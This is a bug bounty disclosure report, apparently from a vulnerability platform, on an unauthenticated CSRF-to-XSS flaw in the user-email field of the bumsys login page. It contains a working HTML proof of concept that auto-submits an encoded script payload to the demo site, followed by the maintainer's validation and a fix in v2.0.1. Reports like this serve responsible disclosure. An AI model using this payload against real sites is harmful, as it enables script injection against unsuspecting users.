Unauthenticated CSRF to XSS on login page in unilogies/bumsys

Valid

Reported on

Jan 27th 2023


Description

The user-email parameter is vulnerable to XSS on the login page. In this way it is possible to make execute Javascript code on an unauthenticated user. To exploid the vulnerability, since the it is a POST request, it's necessary an HTML poc in order to trigger a CSRF on the login form which exploits the XSS

Proof of Concept

  • insert in a empty HTML file this PoC:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bumsys.org/login/" method="POST">
      <input type="hidden" name="user&#45;email" value="&quot;&gt;&quot;&gt;&lt;body&#32;onpageshow&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="hidden" name="user&#45;password" value="12345678" />
      <input type="hidden" name="keepAlive" value="on" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
  • Now open the file just created in a browser when the user it's not authenticated. This is the result:

image

Impact

It is possible to execute malicious Javascript code on the victim session.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Khurshid Alam validated this vulnerability a year ago

Thank you so much for reporting this issue. We will fix this in next release.

leorac has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
leorac
a year ago

Researcher


Thank you for the quick response. Is the report elegible for CVE once fixed?

Khurshid Alam
a year ago

Maintainer


@leorac, Is there any way to get the access of admin panel by using this issue?

leorac
a year ago

Researcher


Since this is unauthenticated, it's not possible to exfiltrate cookies in order to takeover other users session. That's why I've set as medium severity. Anyway it's possible to use this issue chained with other vulnerabilities and for tracking the user behaviour.

Khurshid Alam marked this as fixed in v2.0.1 with commit 516ef7 a year ago
Khurshid Alam has been awarded the fix bounty
This vulnerability has now been published a year ago
leorac
a year ago

Researcher


@admin is it possible to have CVE for this?

Ben Harvie
a year ago

Admin


CVE assignment is up to the maintainer, please refrain from tagging admins for this request. Thanks!

to join this conversation